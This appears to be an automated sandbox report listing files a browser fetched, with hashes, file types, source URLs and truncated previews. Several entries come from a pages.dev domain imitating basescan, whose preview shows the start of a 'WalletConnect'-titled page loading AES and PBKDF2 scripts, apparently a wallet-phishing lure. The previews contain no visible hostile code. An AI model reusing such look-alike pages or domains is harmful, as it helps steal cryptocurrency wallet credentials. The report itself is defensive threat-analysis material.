                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5164
                                                                                                                                                                                                                                              Entropy (8bit):7.914514932137174
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:+EFiPDKgnGcvLOR438+JfV9cZ0VoFRq5bQwsDRiWC8oyA54Bp1B:1WDKgGcjOORf6Fa8XED1yEOpD
                                                                                                                                                                                                                                              MD5:1D1F3881312BFA96709A21BAFE9E5EAC
                                                                                                                                                                                                                                              SHA1:5265AC0302AA8D6AE4BB59CB4BC09640E9AF6B76
                                                                                                                                                                                                                                              SHA-256:D087968D222D825D64E6B210D47D81A0F150E2EAD2DDAF6E798DB551762A50D5
                                                                                                                                                                                                                                              SHA-512:A5975AC9EF7D2BF1FC4EDC22E1AB22ED738F11A41A4EE51E04ACFBE582503EE0F10AA32A776B61F440ADC2147456D0AFE6701999EF0DB2E503547319B0493815
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d..........$.A....sRGB.........PLTE...............D-..........AG.......#.B......H;.............R? ......5-....E:.BH.ORZ...&2HWA#............qL2.....|...lI/...4).............L=.IP'9,.wO5A6.GM!...JV2:0.EK.ke]?-.Z\dRU]LX9\C&....U;HS-+7L.dJW;$=BN>3....B:....|Q8AD.KNWFJU......oqwVX`.}z2>R.X>.^DR8"...CI.DJ.,3C]>'......I0..[Boib...upk29G...fho{}.rlfHA#bE)g`Xwy.KW5@?..hL.pT.aF...jmszvrI7.N:.BFQE8.su{...@K_.mR7=JbA*...d\S^`hxsohE,....x]EK0fG-}yv4,.GRg]UI{..N4......{......~..<5.B?..jO.sWOZn.vYVat.ui....zrA1..tcbem.x_\gzGP4SN:OQ-...DB.7CWOF:a^K...EF!FF(bm.r{.TLAedP.w`.uflw.u..C;!GK(JT77..nm^E4....BF-TU5BE.L?#>9$...xvk.ua.}uYSB_XO.dP.p_gr.MG1]]C=GX.^MHB).k`...srd.k]...=/.@@(D9.<2$.qh{zpH@4XY<...jiW.dW`ckpN<.pZz`UHP`OWfnt..ys[OFzS>{f_.jW.s[o[S.XDflxK8$R?1hVMxXJ.rlW^lU>*C3 fNC{..\B1[G<}mgcH9.lUsb\jJ6pSF.xt.u......IDAThC..{\Ue....(:...... ..`zPI..1...QfRF..GG..=x.RF..2d.d8z.2..0/X)D.d...P!Q.@...<.....0..PX{...}.Z..x^.E.K".[.K...M.6}...|.......;w.<r.....d.@.U$.5.}.6.#V..y.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9662
                                                                                                                                                                                                                                              Entropy (8bit):4.505004206620478
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:9OjuVwnSo5xPa/fAtw1AChAH7VmkYeL3OClhUl3Ih8nF1TEaLgDl:EyVSZLqWR5mAL+Crs4Uwj
                                                                                                                                                                                                                                              MD5:4EECAB98EAF2BFCE5A68DCF99CDAA71F
                                                                                                                                                                                                                                              SHA1:998E739D37CF1B5C0A884F20E855582625722435
                                                                                                                                                                                                                                              SHA-256:FA9813D70408D46DED45AC4ADA5153A88EA4F5619B16A876CE2BC12190D093C0
                                                                                                                                                                                                                                              SHA-512:DC15C77CA74E32FCCE06ABFF67BDCCB8F84DB8718CC2CAE4EEB83598FC027F7239E03EE0AD1136B2870F84921C36A750C12AD8AC42AB9085D479C31BBB72D143
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......00.... ..%......(...0...`..... ......$.................. .. .. .. .. .... . ..!!.J .. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. ..!!.D ...... .. .. .. .. .. .. .. ...... .. .A ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. .E ...... .. .. .. .. ...... ..!!.t!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..! .. ... ... ... ... ...! ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.t ...... .. .. ...... .. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. ...$'..)1..-8..-: .,6 .)1 .$'.. .. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. .. ...... ..!!.. ..!!.t!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!.. ...! ..&+..1@..Ce .X.#.e.&.g.).`.+.U.+.Bd'..=".%* .!!.. ..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!..!!
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1256)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1257
                                                                                                                                                                                                                                              Entropy (8bit):5.300809342483136
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:6Vp9y0TYUzJVKno2Jt7WA6LI3U53hAvN8w:6Vp00TNzJVQpJt7B9Uvw
                                                                                                                                                                                                                                              MD5:31354E3D9F5254A3CC4F2D51816B0A18
                                                                                                                                                                                                                                              SHA1:603C3CCA8A52A6F70E09F1B4FEF3E7A1A2BF92FD
                                                                                                                                                                                                                                              SHA-256:12806FBB2E555F8A1B7CDA402D124A18FA2C98D68DCC74C3CE8083372D8465CE
                                                                                                                                                                                                                                              SHA-512:1043F1C23559365F7E9FDF687786DEAFD4360CC1C6E3BED386C91CFA01CC5C485E4BED5959ABD7FF423FA137B67FE47FDB54F31AE5BC0E2B2DA9FC56F27B8383
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/schedule-new-user-reward-42a6ce9f.js
                                                                                                                                                                                                                                              Preview:import{d as m}from"./solid-js-38561dfe.js";import{s as e,p as s}from"./index-3c725725.js";import{c as a}from"./createHasNewUserSpin-80b2817f.js";import{e as o,ab as n}from"./manifest-51a3674f.js";import"./web-13cf6287.js";import"./router-3828f409.js";import"./currency-format-1c532f37.js";import"./_baseGetTag-c2e287b9.js";import"./isArray-79a0be9c.js";import"./index-cb32ccd4.js";import"./table-f81aed47.js";import"./i18n-fcfac1d2.js";import"./index-96ed660e.js";import"./index-76d972f3.js";import"./http-f4555b94.js";import"./baseService-449c2e3e.js";import"./_baseFor-3fee30d6.js";import"./_MapCache-1fb5cc44.js";import"./sounds-2c4b6e58.js";import"./index-99ee4a48.js";import"./index-c0147582.js";import"./vip-413478bd.js";import"./toast-unhandle-error-992739c6.js";import"./index-adb8672d.js";import"./index-3fd48be3.js";import"./utils-189ac561.js";import"./center-loading-1eaab0a0.js";import"./animate-number-f0294c10.js";import"./localization-extend-fdb9490f.js";import"./_arrayMap-2bcec0e7.js
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5010)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5011
                                                                                                                                                                                                                                              Entropy (8bit):5.361428949446435
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Uz+BNBBnB3C3jWqsd8X2j3AvFHSFBf+7YgvjAlYA+qCG/m6iBjCw0zQLv:IAzBnBqsd86Q9y/m7YXYK3/m6UCR4v
                                                                                                                                                                                                                                              MD5:203BA79AFDD61721A21BCAC085B3F06D
                                                                                                                                                                                                                                              SHA1:93034FF74DE28CB335E2129157CA7E16B8EA8FA2
                                                                                                                                                                                                                                              SHA-256:3A53D82861CB80282BA21EB60CAC66036B6D1762BC45E7C52D57592A9971C60D
                                                                                                                                                                                                                                              SHA-512:48B1A44EBA083E8DFF0A8377E765E2E6456A274CFB36E40D2C110D7FA7D257E8AC0A99CF462200A11C7465EB765010BC203012843F384264D5148A176D7B9AC4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/_baseFor-3fee30d6.js
                                                                                                                                                                                                                                              Preview:import{g as m,a as D,L as $,b as d,M as K,t as p}from"./_MapCache-1fb5cc44.js";import{a as w,i as k}from"./isArray-79a0be9c.js";import{r as g,b as T,f as R}from"./_baseGetTag-c2e287b9.js";function wr(t){return t}var W=m(g,"WeakMap");const v=W;var N=9007199254740991,q=/^(?:0|[1-9]\d*)$/;function X(t,r){var e=typeof t;return r=r==null?N:r,!!r&&(e=="number"||e!="symbol"&&q.test(t))&&t>-1&&t%1==0&&t<r}var H=9007199254740991;function z(t){return typeof t=="number"&&t>-1&&t%1==0&&t<=H}function Y(t){return t!=null&&z(t.length)&&!D(t)}var Z=Object.prototype;function J(t){var r=t&&t.constructor,e=typeof r=="function"&&r.prototype||Z;return t===e}function Q(t,r){for(var e=-1,n=Array(t);++e<t;)n[e]=r(e);return n}var tt="[object Arguments]";function x(t){return w(t)&&T(t)==tt}var G=Object.prototype,rt=G.hasOwnProperty,et=G.propertyIsEnumerable,at=x(function(){return arguments}())?x:function(t){return w(t)&&rt.call(t,"callee")&&!et.call(t,"callee")};const nt=at;function ot(){return!1}var L=typeof e
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8274)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):11135
                                                                                                                                                                                                                                              Entropy (8bit):5.460751362876675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:AXajubbBkBn2ktQaY86sd5KmSVxYzuQ7iWGZTgaXkXYX4XhXEXYVEBHf7HTWHMkp:Apbkn2ktQaN6KSHY6Q7ibZTgce6aB+YT
                                                                                                                                                                                                                                              MD5:08BDA738E245823F190F5F1949314019
                                                                                                                                                                                                                                              SHA1:6FF0291D89B0E3DE52C6586623DBEC07A3D5F09A
                                                                                                                                                                                                                                              SHA-256:14CE7879EAE193FC90C96CC7D5B8D95421F5DCDF90AE19D366B48AF8DE0B9A57
                                                                                                                                                                                                                                              SHA-512:D97E1E754C584D7FE85B6EFEFD44E810BEE10BC2FDAEC2BD047F8BC1D4E4686AADE8154EF4A7C1C5CE99CE9A618BEFA90DF236F2438459791A36DF6E0DD7AEB3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const __vite__fileDeps=["assets/ThrowAndHighRolles-DADNM0eC.js","assets/index-DD2Zk4iT.js","assets/index-CrXVjlJA.css","assets/index-DH9MDtxd.js","assets/_basePropertyOf-BhSQSS-6.js"],__vite__mapDeps=i=>i.map(i=>__vite__fileDeps[i]);.import{c as i,t as f,ay as B,aB as U,X as O,_ as F,y as N,d as W,aC as j,a as C,b as x,o as D,F as L,ah as K,ak as S,i as p,x as h,l as $,s as y,h as k,q as J,D as H,m as E,C as w,aD as V,B as A,f as _,P as Z,Q as I,aE as G,a1 as q,a7 as Q,aF as X,aG as Y,aH as ee,u as te,ao as ne,j as se,aI as re,aJ as ae,G as P,a9 as le,e as z,W as oe,r as ie,aK as ce,g as ge,al as ue,aL as me,aM as de}from"./index-DD2Zk4iT.js";import{S as be}from"./index-CMxvzQWG.js";const R=O(()=>F(()=>import("./ThrowAndHighRolles-DADNM0eC.js"),__vite__mapDeps([0,1,2,3,4])));function mt(){return[i(be,{get title(){return f("Latest bet & Race")}}),i(B,{class:"mt-2 ml-auto max-w-100 sm:!-mt-10",get children(){return[i(B.TabItem,{get title(){return f("Latest Bet")},class:"mt-3 min-h-96",ge
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):5259
                                                                                                                                                                                                                                              Entropy (8bit):7.922410843208502
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:SRlnMq4nCo4meJnOVhwzSRHpyiX+7CvgeFfXP62xespq1XZFkeNiyQeUXFe:STnMvOO0Wy7CvXFvPtexJF1iVeOFe
                                                                                                                                                                                                                                              MD5:3137F6EDC0F520ED0AC1CBDC013008E1
                                                                                                                                                                                                                                              SHA1:25427AF4456382570809BA64022FAE33506F0606
                                                                                                                                                                                                                                              SHA-256:2DE2E24815DEF39B2D29D6B0CC7C61586513A2B55079AE99C97F9EA7C2D6DDCF
                                                                                                                                                                                                                                              SHA-512:43146E046653BE3CFDB13AD9EE01DCFD02EDACC302CF30400580190865B01B7AA8F389AA2C9B45A387AB4198273FADD693B7D8FE85A501DC5052DFECC11F27B5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d..........$.A....sRGB.........PLTEmg?pjA\T4dW<b\6rlCf`8ohA_X5ke>..o\L7VOYqkBpWFid;...........SLVEG4ZP3....rqiqC:G;1?...haie^fSN<tZJ.{.~x~......`B4..7-<?6C.....^U9ha<zsz...x.........J6(YO;.eU...............CB.PHSMEPvpv..{aM;.zib[cmfn^H7G?Je];...2(7\=0...........nJBM[S]LK8...mRCx]M.q`tlt...?=)hR@.iX....}k........{lu.~.YR[`Wa~bR{hoPD/XJ6gM>_SA......R9-jWB.ve{`O..uKA,SH3aR:...*!1.vdvcj.z.eH:;8$]X^....#.tmE....l[.........*.lcl....qzcUH....u~62.%&.hYO.o^...p]c...UO3.....z......./+.n^WU{T..{..u.sw.nu.......t~............l............eTW..qkY]........gKwM....3`;..g...:hA\ML.4 `.X.....c <&D:2uda/51j.ZBqF....v`PR(N/-W5..n#.)$E)BBA......XB5cwbXKC:;9...{.`*7........omt.^||t}id[m`OkW-C69RC4E&G_9.{z..k......num:T/DYM..tKFFPKL.~iHO0TmDCiNn|c..|v{jR[V.qj.yrfmhxbZV`>}oU.y\cxOebEsyVoeJdoKsmP...<...9IDAThC..y\.U.....a2,.&P6...(....>*........Pbb.(.."d.Bf.4n..../..1w..y.-.7r.l\.%..w9.w......K.~..s.........d.8.k.....]E..S.N./5.1...EHttt.V.zp....:t..(..G&.0$.m..}*
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (19931), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):19931
                                                                                                                                                                                                                                              Entropy (8bit):5.680457746875887
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:WRQ2kvcAAdTRhQLThP2yO9/9G84U5xOiKQYHHHsglDep9m1TfB8EKLMyA+LyUyy9:xThP2V/9N4U/gQYPXP8jAPLyrZ
                                                                                                                                                                                                                                              MD5:4BAF1850C9A72CBF72B60EE77F226E28
                                                                                                                                                                                                                                              SHA1:C5ABE8FDC43EFDBD8422BCE62037C19824B8F8DF
                                                                                                                                                                                                                                              SHA-256:4F7EC08FECCCB8FD7E7F49C1B85040532A1FC9CFB060669FA6F39B04F03090F4
                                                                                                                                                                                                                                              SHA-512:32D37EF080A9A815E7AD43185F2925AAF2D306FE82795D859205718E77F526D5AAF15FD7FBEDF1BB0D4E34A5966097325C0313448E34EE36600727E883016937
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/jss/qrcode.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:var QRCode;!function(){function a(a){this.mode=c.MODE_8BIT_BYTE,this.data=a,this.parsedData=[];for(var b=[],d=0,e=this.data.length;e>d;d++){var f=this.data.charCodeAt(d);f>65536?(b[0]=240|(1835008&f)>>>18,b[1]=128|(258048&f)>>>12,b[2]=128|(4032&f)>>>6,b[3]=128|63&f):f>2048?(b[0]=224|(61440&f)>>>12,b[1]=128|(4032&f)>>>6,b[2]=128|63&f):f>128?(b[0]=192|(1984&f)>>>6,b[1]=128|63&f):b[0]=f,this.parsedData=this.parsedData.concat(b)}this.parsedData.length!=this.data.length&&(this.parsedData.unshift(191),this.parsedData.unshift(187),this.parsedData.unshift(239))}function b(a,b){this.typeNumber=a,this.errorCorrectLevel=b,this.modules=null,this.moduleCount=0,this.dataCache=null,this.dataList=[]}function i(a,b){if(void 0==a.length)throw new Error(a.length+"/"+b);for(var c=0;c<a.length&&0==a[c];)c++;this.num=new Array(a.length-c+b);for(var d=0;d<a.length-c;d++)this.num[d]=a[d+c]}function j(a,b){this.totalCount=a,this.dataCount=b}function k(){this.buffer=[],this.length=0}function m(){return"undefine
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (36908)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):36909
                                                                                                                                                                                                                                              Entropy (8bit):4.1893337868179055
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:jEFiW2B8B/h/i5GdQxMvi0uQrjN+uq0hX:jEFiW2KRh/eOwQ3YuqUX
                                                                                                                                                                                                                                              MD5:0B35203656FDE7B5F83CB61B742275C4
                                                                                                                                                                                                                                              SHA1:97D95427143BB52AC8B8FAF8C9AD13ACD0F39EA5
                                                                                                                                                                                                                                              SHA-256:C062C65E426BC6FA59A742DD6F4226AB6F58E4D84D3F155C2B4780B218F4EE6D
                                                                                                                                                                                                                                              SHA-512:36044F4301BBC633FFBFA29A91DE67B1B914F85D8851E09C8CFA20E70BCE5F7751827DCCED845000780AA56A9546C57F7FE721831A0BDC0F8B03A51A48C82C51
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var d=Object.defineProperty;var r=Object.getOwnPropertySymbols;var g=Object.prototype.hasOwnProperty,M=Object.prototype.propertyIsEnumerable;var o=(s,L,t)=>L in s?d(s,L,{enumerable:!0,configurable:!0,writable:!0,value:t}):s[L]=t,e=(s,L)=>{for(var t in L||(L={}))g.call(L,t)&&o(s,t,L[t]);if(r)for(var t of r(L))M.call(L,t)&&o(s,t,L[t]);return s};import{j as i,b as Z,i as n,t as C}from"./web-13cf6287.js";import{e as p,c as V}from"./manifest-51a3674f.js";import{i as h,c as m,m as H}from"./solid-js-38561dfe.js";var u=C("<svg>"),f=C('<svg><path d="M19.6912 5.6001L9.2912 16.0001L19.6912 26.4001L22.7088 23.3825L15.3264 16.0001L22.7088 8.6177L19.6912 5.6001Z"></svg>',!1,!0),_=C('<svg><g id=share_media/telegram><path id=vector d="M4.90694 15.2947L26.2758 5.47633C27.0847 5.10485 28.0305 5.4855 28.3877 6.32673C28.515 6.62491 28.5543 6.95474 28.5022 7.27707L25.6344 24.999C25.4582 26.0876 24.4667 26.8222 23.42 26.639C23.1213 26.5865 22.8386 26.4616 22.5952 26.2741L15.3683 20.7061C14.6572 20.1589 14.5
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 100 x 133, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9612
                                                                                                                                                                                                                                              Entropy (8bit):7.972609157677801
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:RRjrOFBqm0Qyobu0YfGHNWCk2dNLRqe9cQxIg4/nqHf6eupUq6y:RRuvqm77KotxfLRqemQxIg4Saz7
                                                                                                                                                                                                                                              MD5:11E0B614731835DD2095BA17E750A9A2
                                                                                                                                                                                                                                              SHA1:EA1AA78D4F91DCA2544E1529EF796CB23511CF19
                                                                                                                                                                                                                                              SHA-256:AC31B88D7920845DCDF6751867F5066E73D5DED425EA29979ED034E98C5D30F1
                                                                                                                                                                                                                                              SHA-512:D85EA45153A659A0D96AD5FE7F9721A7A9FB8F198711FD5CAB6493B9B618ABCFA26C24345853CE32010712D999C51BC47A951C40E55375BB54918B5D98EBE1C9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...d........."..$....sRGB....... .IDATx^.....8........Rgm.f>......K.. ..}$......G_.....;....q.J_.y......_9..(1.x.7.....>s?w.<.2.N.O...os.....y.q....D..u.6I...$X..D.d.......9......i..1/.o...Y,.q.....}.=.U..~.~....T`%&..P...<...s..P.....}.n.\hUE..*..[n|.U.6:.n5?0...K.....U.c.G.l+V....!.(.J0....j....7..U.+|6..y.qr...f%....g.)M..m.X....j...:YTV.V:....r...^.....&.....H/.5y......s^/.2P....HE2]81..2aA..7.q..o.b.......m...t.T....Yy..S\:..M.&^0C..S..SG.[...m.......{.x.y.J.? ....C...WL..?.....G....}_..^f...+`...f.rbl.......0...K.*.d.....58.d.......C.X.C..g..u..>c...:a...y!;..E4..i;..=.C..H.z.....#..^0Q.Q..P...J..q....1-...:.../..k..."j..1..F...H......d.~..az.eXM...x.F...gV..7...rs[.y....:.k.+ts..mo......J..<H.dO|.N...a.Y\O^.Y.....K$....KF$.a..U......u...e. ^...Vx'P3.H..SPO...:.CM^.R]. ..I%8..+y...I@...X.+.._.#..<.z.(.:....~)....2+?.4n..f.F.Ds>..V%+!k........[.W..q...#.UV...N;.L4LawAj..W|..4Q.g,...W]......Zs.<<..>.,.ft.S..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):48440
                                                                                                                                                                                                                                              Entropy (8bit):7.989754000529123
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:WFcfssedf4qV/l9y4ulCypeBsPvbDJje22sPdPK4zpmac6+vx46b/MX6:oc2ACNLfyA6fhxrdS4z0aLExnMX6
                                                                                                                                                                                                                                              MD5:7C0EB691304BEF6D50CB13DBB6CB0113
                                                                                                                                                                                                                                              SHA1:6FCAD50C8A8B93714893F9DEA5371A9396F2F995
                                                                                                                                                                                                                                              SHA-256:DFA603A08211A1DE27DCB9DA317AAC81EEE5123E713E33937BF71822F2D31E18
                                                                                                                                                                                                                                              SHA-512:87E5A99D64AC5F03EAB796258DE7EAAB4EF3A43B8FD598D502EC39F490AD409E50E92904FDC08A41CA6C6DB9F6428A94E57ECF79168C1C43DCC7EE9EF057D586
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://api.web3modal.com/public/getAssetImage/7289c336-3981-4081-c5f4-efc26ac64a00
